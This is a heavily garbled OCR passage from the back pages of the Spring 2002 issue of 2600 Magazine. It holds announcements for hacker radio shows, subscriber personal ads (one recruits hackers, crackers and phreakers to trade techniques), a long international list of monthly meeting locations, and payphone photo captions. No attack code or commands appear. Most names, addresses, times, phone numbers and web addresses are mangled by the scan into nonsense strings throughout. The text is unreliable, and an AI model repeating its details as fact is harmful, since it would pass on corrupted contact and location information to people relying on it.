network? Do you need a spy" (i call Jasor? Taylor nt i50i) 2 3d-
| A ■ | po.' i Li: id . ( 3 1 . i i icpj i ? ic ■- pre 3 c n cd sb(J f ii m r or c 1 1 iaj I
i ay lord 1 1 n>: :. art n.i. oo 1 1 1
Announcements
33 IH2D - A WANTON DLSpLAY OF CONTROL AND DI^RUP-
J'tON, W [>r "D is a h,d! funis radio -mlie pwxlut't-d by n small group
ni otherwi.se uncniploycd individuals w.»l)i roomluls or old rc-cord
nigs, analog .syndic.-.. Air a. and racks full oi tiraoiM dcirtronies gear.
Burn out oi the pirate radio scene VVEX'1 3 Lars s r xi slier! in various
lortns on various imouthori/ed raiiio I'ru.iueoclr' 1 - tlM longer rhim any
of Us cur* io recall (nr want to .id run to.i You can hear W[ JCI J every
Friday at fj:,ifi pm ET or 74 15 KH/. shortwave ami on other rundom
trc^Lh: lines 1 1 yi u dun i have n shortwave radio, you'rv mi wing out
on .some imtnwiijig siuFf Chock oni orir we^ile fra itiprc intsTFiw
I ton: hripr//www wikdradiG.otJtri. Verified WfXD listeners will gel si
true mu prise. WDCD Radio. M4 S tfth hi 133. PhilrideEphtu, FA
I y I -T? 1 2 1 5 i C432-13 3 25. [ ; \ nni I nruiil ^ wi k d i : ud ti > cran ,
H A ( KEkMlNJL Tune in Thuixdxy> at |U pm 1 . 1 by Often ing I ora
ijojj Tj 6 23. 4S. Sft'JHtd iviih Winamp or Real flayer to hear f irteker-
mind, the straw fra- using an ihe-opirsicins rd ibixse m ttie hacker
isiiBd. For 1 1 lone detail v, check out www h«kenmnd. net
OFJ 1 HE. I I(>(>E js (be weekly one hour hacker radio shov. prer-
sgnted Fuesday mglus S;(K3 pm FT on W H A E S53.5 EM in Mew
York t n >- Yon can also tun m over the. net af
ww w.2N HJ.con doff ihcbook nr on shortwave m North and Souih
Amt' lie a ul 74 1 5 lib/.. Vrchives. •■; all shows dating back to I ‘IBS can
Ik- found ill ilk 2600 site, now in mp3 I'oirmit' Ymn feedback p, we I
s ome at oihif|f2£kKJ’.i;i,iiii,
Personals
S TART INGA HA VOR SI TPORT GROUT :md need piutfedpa-
lioii from cxpciicnced and mex pinicnced hg.s^r?, ( ernt kci'i, nod
phrtakers. H yuii wmjbJ liken- join this FRTL wrvtye. write nte m
i he Addrc^ below. You may be ..ivked lo search for information oji
( he 'net t' ■ aisiiiu others with lesri cvperranic tfr .submii kqpw ledge nit
(ttdiFisqucs you know ALsn, isKiking for poliiicul views and electKtpii
pn>}i*vi!» well is itkias tor bat king to; .■ magazine I am starring
Write (o me at: i.iiriv flcaiti WheeDf. Ki J Box 150-8175*32, Fort
SiiKkUiit, Tcufu* 79755. Ail inquiries, will be unswered.
IMPRISONED MRUS W RE FER. Tbougfe I fern still a novice ai
v : i ii - tciimoJogy. 1 do wis h to become more I.bito IcDgcable through
i irrc,spi mdener with skilled ^ a’us writers 1 will gladly pay tor :•■, ocb
Dank l McAvcy #64A26K. Rl. I |Jm \ 50, Tennessee
Colony, TX 75HB-1
ONI A Slim RISERS < AN ADV1.M1L51 IN 2SQQ! Don i even
think . -mlh trying la lykt- out an ad unless you subscribe 1 All ails are
litL :ullI there rs tlo iimciiini of money we will accept for a non .vuh
scribe! ad. Wl- hope mat's dear. Ql l. imr.se. w* reserve ibe right to
p;o.% judgment on your ltd and riot print ii ii iTs niifuiyjttgjy .sdipiil or
has notliirsg at afl u? do with the hu^er world We make no guarantee
as in ihe honesly rightciiusncs-., sanity, ek of the people advertising
hurc. Cniuavi diem .u your |>cril .All subinissjous are for ONE; !S-
SU L (J N LY 1 1 1' y l nL W'lins to run y our ad more i lia m mcc you mi ist re •
submit it cikli time, I'Jrai't enpec-i os to inn jijs.Jiie tluui ran: ltd fur you
in a single issue eiihei Inc luck your address label or u phr.Hfocnpy so
wc know- you're a subscriber Send your ad i> ■ 26<ii i Markelphicc B 3
Bov 99. Middle fd.ui.l. N Y 1 195 \ DcadEme far Summer issuer
h/L'02.
Spring 2002
Page 57
ARGENTINA
ItUn'cios in ihe ton at Sin
Jotti-flS,
AC'STRA CIA
Ydc-fsiRlv: Gw side Ihc Deli on
Pullency • :-*i.*n*iv-rly Sssimiv>
Snack nea> the valuer of
Gsviifoll A' r j iT|h-Bc:y ft pm.
Mri>hLLi!f: Hungry JdL'k:, ON the
Queeo Si, Mall IKHS. np3.T03.1Ee Inlo
1A I >■>! h I - 7 pin,
OmlHimt: KC'v Virtual Reddy
Calc II i.OSt KVC 1 "uv n. .'pm
Mu thou me ; Me Ibtrt true CiTiET.i I
Shi -| v;n n ir. Cenlic || tit: .Swojrvtnn
SilCCt cnlrTMKr Ik: .LI I he fMjll I ill
ph<me:s.
Perth: Ric Mu rCwrH lea ;miJ Oyl
(W House, 18.7 Murfuy St. 6 pm.
Sydney: The CfyAiul Foi- ■ t, front
hat ' ■ si jo, opposite fbc Inis fitLiIiflH
:uvii an CiLtnpij S trcci si Central
Stuihiti, ft pm
A l SI R] A
(im: Cafe HaLtcstrUv on l-Ao-
ttklniiplnfr,.
BRAZIL
Bela Hnrblknle: Petcgo'i- Thu at
Hear the payplKWie . 6 pm
CANADA
A lllerlu
< tilbury; Ei.uu Claire M. i'M tood
Ci.mil by [he hSaml ydjuw wall ifitf
iT^erl l rhe "mil-. ■•■ all ' 1
f’tlrmrol ijn: Etlmoi'ilon. City Centre
LuwjBlf l VVv-sl in rite Skid Li.aH
hv Hi.' [wyfitnines,
llrits-sh Ciilmribiu
Vuncomw; Pacific Can ILL FlxxI
Fair, i.tic level l<. .- wti. |‘Htn 0 eel
level by jwyphout^s 4 pm to 9 pn i
VtcinriB: ECiltm Cfrdei food tour!
hv AifeW
New HiUJttwkk
i S i.ntci i.mi r Ground Zero Network
NW Maui St
Omar in
Rurrie: Will UtiX Coffee Pub.
Rryuc Drive. 7 pm.
ILndltnni hicksi n ^|uatc foofl
cmiri by payphlwii. ml Burger
King. ?:3p pirj-
Qiiwei
Mottimfr: H. 1J AmpbiElf.ilr:.
| (jflO tiaucheltere Steel.
DENMARK
\iir+usv: ! :i the Or , ornir M tfctO-
P-S-fr cafe m Lite f ad Way ^Cjttiop
Cupenhagi-n: IcrrmriaiNr iriTiuL
ctJtiriimpwL'.. 1 1 !> Shi.Tjip.i ill Cl nier.
ENGLAND
Rristttt: ftejo to !oe OrHnp.e .aid
gTC k ppl phi l ilLV tippOSLtL Ull ■
"Gsmib* siuro. Merrhinl Street .
ttro:i fire end, Pay planes- +-44 II"
9299011, 929447': 7-V' | in
Hull: : n rh* Old Guy Mane puli,
Lippi mile The SJikih.ee saijr "I Hull
7 pm.
I.Cfds: Leeds C'ily Lra'ni .fljilkltl by
the [lay partita, 7 pm.
Li union: 1 nxsi I eii^ Stamping Cl-el-
ii-< • near Pii-LdflEy CircilM, "tovveit
level. 7 pin,
Manchester: the Green Rjoffl • n
WhsswtjHhSiimJt.? pm.
S+iulhamphxi: City Center lil the
InEcniei Cafe in the Eajr^ate^ ” pm.
IRVNtr
Purfs: r-'i-iLc LS'Italic- XIII in front ol
the GtatnJ Ecrafl Ciiitnua. 6-7 pm.
GERMANY
Knrlsrrriu:: "OLJ Dtihliii Irish
IAjSi, Kapdlciiiirai^e.. Nessr puhlir
ptroae, 7 put,
GREECE
Athene: OutsiiJe ifw kwiCsinre Pn-
paswsjrifm ini the otH'nek oi'Patisicu]
and Siv>um;i:i 7 pm
All meetings lake plocf on Lhc
r*i star i lj ineoting in your city.
ITALY
Milan: Piaun Laielif in IrLiiki Ot
McDeitkiSiJs. >
MCXirO
'ih!isk , ii City: SiAbvvay Mj-
ti.vp I l ine 2 oi i lie Mctsn ■. bJviii line )
,\i the ‘ 1 ■ piirtaihi'ijio (teil D^biW
F'crJe'.,]]" e>: it . i He payphones A
Ihe candy -.hop, at the begirminp i«l
ihe "ZiK-oio-Pi nu Suarez ' tunnel
M W KKALAND
AuchSuxid; LontlnTi Bar, u^Laiiv.
Wellesley St-. Aut khi»d Central.
■ARJ pm.
t lii isl etUkCLh: Jo vo £ ‘:d>. i.-nmer rtf
Mi oh St. a.oi.t Maiichcsier Sl ft pm
VV ciliTjgtijn: Mpiphy''i Bar in Cuba
MtiSh V30 pm.
\f mww
Oslo: Oslo Septra I I nun Station
7 pm.
I'mndEieirn: Rkk -■ c afe m Aix
die "ate. ft pm.
POLAND
^t;ii-iiarri S/c^dnAls Ail <. al'tc
Unn^ blue IxHrk. 7 pm.
RUSSIA
Mo^tovt: Bkkigor On^eii ejie ■ .o
T-M</J .-\M‘ {Telephone Agency ol'
kiis»iiJ’|..:Legrr,:ih Agejiey of SoVid
L.'iliiini u&tk klK'WSk as Niciivkie
VoLtrra
SCOTLAND
Glmi^kw, Cental Slali'in, pay
pt^SLIO . ,CSJ i ::- [ ' r I Mill I 7 pm.
SOI I H AFRICA
JohiirmrsliuTE (StndtiM CtVy'S:
S Jiklt’ ns Slki k! e( ms t ft: ? U p i H .
SWEDEN
trtfvle: Rniiiv.;,, : strtirm
GNITKD STATUS
Alabama
\uluirtt: 'The student loumrc up-
.-tiiins >fl tin: J-’f,;. t:niLJki Building.
7 pm
lismiimKtimii; HiX>Vflf GaUftis
l lx hi e am by Tilt payphones ncxS ft>
Wirridy'.H. 7 pm
IksCdhtosa: Me Par I ^.nd Mall fotnl
cmill rtttn the I'nm, ..'.nlrarrc;
Arixoad
Icmpc: GtiS'],: Wdrfc^ trt Nrimaik.
Mills; Ma5 1,
Tucson; Ramev A Nuhlr'.. ' I 30 E.
I : rtvSKf vifa v.
Arknsajr
hmvsJjom I uJi-; Mull i'ljevI etfttrt
by Ihc ht£ wincUnvs
C^lforqfei
I .utAit^lcti: Union Slat :nn. c.irncr
of llaey A Alameda, fende itoiin
eatmnCL’- h-. hank of ptii^iic Pay
phtjn.es: 12 S3) S72-Y5M), >)52fS:
62 ?i ~'Vm. 9924 . ft 1 3^7 04 . 974ft
Omits;* Ciyrnty llpspona Niguel jt
hint CpflCx, 27020 Alicia
P:iA:w:iy, -Up.
San Die^o; U^ckliaV Pi Mem on
ReipeviTH Road iMmv Shoppirt"
Malt?
Suri Ir:< tWJsefj! j Embareuckf'.i
i 1*/:a ii.iiiidej. (fetyp hones: 1 4 E S i
3^4 ftyAL. ’ jxi ji
Sun .lose {€aj?npht]Lt: Orchard
Vnijcv CtrUL"': Shjjp-Net Cafe on the
l tf me r tif S <7c ■>': ;l Avc iind h
CumpbeJ! Avi;
.Sstnta Rnrharg! Cure Sicnn um
S tate Sireet.
Cothnuto
Jitndder: Piilty J's feed covfft, 1 3 l£:
arid College. 6 pin.
f.'tinncrtiLUl
Meriden: Mcsiden Square M«ll
food court ft pm,
Dislrirl ol thiluinhi^
Arliihpttmr K-iHbjj;<j«i Cily Mall in
l he food Crtmt 6 pin.
Florida
F(, I-jTiimli’rtiijlc,' BuwnnJ Mali m
iJiy fiaid court by the paypnonca,
fioittttliitr: Ahrde.- RevA Su.a'e .
L. itfe'e* r t 1-7". .v/MSev, Ik-rry
Ottilia
Atlanta: Lersnu \! i! loorl coins
::7 pm . m
H awaii
I loni d u I u : Cnjfee Talk t. .tfr. WJl
WuhlIjl A vc Pav phono 02-
L >1 S4 ftps ri
Idaho
IAh-uxcUu: Ciilk'^e Market, ftii-3
South Sth Street
Qtthris
Utleagti: Ution Stanon In iht
Grejt ICdt [L-esr .ihe payphone v
Ludiann
Evansville: humee ;.inij Solve t-afe
al 6^4 S Crrecjn River RJ.
Ft- Wriyne: Ol Clkbi •• m k Mali feext
court m hunt of Siwrrt'fi,: 6 pm
ItldliiliapnlhL Hordeix S.kjtjkH- i .at
ihe eori'HC : Vises 1(1,: I! Li:-:.:;i
WnsJ linyLtHt.
Koovsi^
Kansas UiJ lOn’rlund I'urkl:
O&k : ‘..Tk l-i ! food llhiii
r .liuhtiaita
Baloii Rouge; In die LSI Union
: veer !tie Tijtrr Pause
A- Me Pqilah |‘.y Ftest to tile pti>-
pbf ’fteS. PnvpiKi!!e BuifiPCh. : 22's>
387.-5420; -y>l% '■!?%$.
97J5
Nt-v. Orltiums: ? tliinWlioTi Qjlf^ie
I m >i I’-te, 5:' j 5 G ,. ; i;il 5 ; ;| ■. d . .; , pii ,
ATnSno
ftirttawl: M»i| hy tlw bench
Ml the ■■■■.-- 1 cr^ut door
Mnryluiul
B.ildimirc: P.m oe^ A: Noble bait jU
the liuier Harbrn
ijfefflprh useti ■.
Boston: Pnj.kbtiiil Ccntci Phubi.
, i rtuce fw :d n , L i il ; 1 1 ie in ! i n tjwr
d te 'veil hivvw^ , 7 pm;
MiitrlborougJi; Srdo’mnh Park Mil!
i’lxk] eoiiri.
NorthnoLpr^K fiiVLutei i. -.!e acRXvi
from Folaski Pack.
Vijchigiin
\nn Arhnar: Midlipim Lhiiow (Uni
vcmiiy of Miehitjift.. Acikvr
Riwul
(fraud Rapids; RiYdUhiiWi Crciss-
ingi ;V|;lI'., vaeohd (eye l in the ftn-xJ
eourl.
MliuWsotn
HE,Mjf3ii!lfftfi)»i: Mull i t" AmrrieLi
noriJs '.iik 1 i.:.,-l ■.■■.■ :ff. ac-ioss from
fiurjter isiirtp * rite Ixink of pay
phones that don t r'aL.r- i n ■: -: r-r r- l r ■
ca.IG.
DulidU; Bumye A. Noble byCuh-i
7 pm
MLwimri
tvailMIJt City lEidL^cniltnri):
Bimcs A Nvhle, I9t2tj Eavi
49th Sl.
Sl. Lnuis: £ iliena, Highway ■<* i (t
BffiJilivtu id, Hcvjited wi tmn, Il'iilI
iXHir! a am. h L the ihuuiets
Springfield' R.mn; lV N il rtH
Battlefield ik-tQS,v from tlx .n-il
5: jo pm.
Nthrunkii
Om^lUi: O.j.S, V'rteA Mall Bamov ,y
Nobbc. 7 ].nrj
Nevada
I aft Wgftif: vG>w Superstore- CaJ-.-.
Snkare A Dnearuj-. B pm
Ncfi Mexico
Albuqyvivjnc: Winrock MjFE food
cotirl, nc.ir pjLvphoncv lhS ihe lower
level ftetWijeEl die Lbual ;lin &■
urL-ade.
New York
Buflnln; Gntlcri Ik Mj|| luod GoUri.
New y wrk : (.hiijitiin p Ctri ter. uythc
j.;iftfty, uLar me po:>ph.pijffSh : ist.li
53 fd Sl,. Set wee n Le v i St^Loh -V. .N lJ
North Cartilmti
Clwilsrtlrr Si'uih Park Mrtlfj uppto
j,i e.j L?f food LUtiri.
North DhIiIiLu
largo 1 Moorhead. MNl: 1 .“nter
Mall (ohplI coiifr hy tJiU tlHLiitaLts
Ofak>
Akron; A min ex on SS. Maikei
Si roei, internet tiari of Hawkins, W
Mitf-keL, and
Cirrin mli: Oody's (.'VtiC'. 1 1 1
licnui Si., for. hack rritim ft’ pro
C,f vd'land f Bed fund); Cytier Pete -
Internet ( ■■■■■■ r. ftft.5 Braid ms;, Ave
CtvIumHus: Cvnventiun CcttiiT
i downtown) basement, far bad of
bu'floillg in 1‘aipeted pav plirtfie JUVti
7 [jrn.
Dapun; At ihe Marions behind Lhv
1 ':iy Li.ti M.ih ft fNli
OkLtiiPm:*
OklHbomu t i?y: Penn Square M il
Hi the edge. lllo hjotl .■■■..it by
PrCJJtel Ltffjjf:,
LYiIki: Vl'wdJand Hills Mall fiXKl
Cnurt-
OtV.gim
Portliind: Pimintf Place Midi i.mk
Platte er Squibroi} .food cuurt fi pm.
Ptiiuvyl 1 vania
PhilddHphUt: (tHi- Screei Suitniin
foovl v'( v . r t. fl: i 1 ■ 4:mg wji-ttLin
Pittsburgh: T -N‘ i.PJ Ian Pin t Jniim
bulking Oil '-ik: ! i bersiiy ot Fill*
i urgii xunpiv. by the Blgelnw
ifonSfevtnd e-nt mi re
South Carolina
Cbuilesiton: Northw^pd-v Mull in
tin hull fend 'rve.fji Sc , 1 1 - anil Chik ■
Fil-A
Sou Elk imkrtln
Sioux Falls: Empifr Midi, hy
B-.j.;ger K my
fi.r-.nvv-.ev
KnoAvilly; ECmJujs Bnuks Cate
"iwwihA fitim ^stown Ms II
AtempblS: Hi, u-.:.y A: Noble. Ifkk
nry RjiL'p-.M-nil,
Nashville: i-j'fi. Market, 1912
Hr uatlurjiy.
'HexsHt
Austin; Ekshpe Mali tot >4 touri
Dallas: Mattra'9 PtefcU, CamjibftU &
PripstriFk. 7 ptn ■ ■ ‘ ' ,
Uou-fiin: Cttfe Niehblaif in GailcrsT.
4 vi.i> AntonRi: Non Ik Slai Mol) !a>. 1
utiurt ft pm.
Chili
>,||( Lake C-irv: /t ' 11 Midi ill ihe
lclsJ L’uun i Lear Zion's B jll i k.
Vi-rnmnt
Buihpigton: BitrtSei:. Bimks .it
Oiui'di Si. and Cherry Si bn ihe
see L-.ru L Koor III thy Late.
4'ifgmb
fsii- Dpt riel of CnluinMa^
WashiivgCkri
Seattle WLLshingiitn Siait tmrtfii-
rkjn Ccnii. tor fioor ft p:;?
IVjsLuiHin
MmtHin: lluieu? Srtnth i'727 N
RilIuMI Aye. t Oh ihe lower Levni in
The Marlin l.uihCT Ktn^ fr. Ltaingc
i v the pay plionov Pnyphouti:
75HWC
MUwuuiiee ( Who wslosafr Shiy-
i.iir Mill! fin Hu HMJ A Nfrn li Ave
in Rnurii f/l llhvG! jG- 6 pm.
lirsi.. l-'rulay cit ihc moniii Unless oihcrwifitr nr«i:d. they stan ut 5 pm loco! Lime
leave :i nic^sge & photic number &i (641 )■ 751 .■ .1600 or sond email lo n tcc t i u gs tc 7 600. vOm -
2600 Magazine
Page 58
unsterdam* Increasingly hard to find, this
i "ik- nnl\ accepts coins.
Amsterdam, Increasingly easy to find, this
phone doesn't accept coins.
Photos by Daniel Langdon Jones
1 ome and visit our website and see our vast array of payphone
photos that we’ve compiled! http://www.2600.com
Phnom Penfi, C nmhodia. A card-only phone.
Photo by John Bullock
Phnom Penh, Cambodia. Close-up view.
Photo by John Bullock
Willemstad, Curacao. A shape and color so
rarely seen in the Slates*
Kyiv, Ukraine. I’his rotary phone is said to
only take prepaid smart cards, although it's
rather hard to figure out where they would go.
Photo by Phillip Bettac Zoufal
Photo by an anonymous Canadian
Look on the other side of this page for even more photos!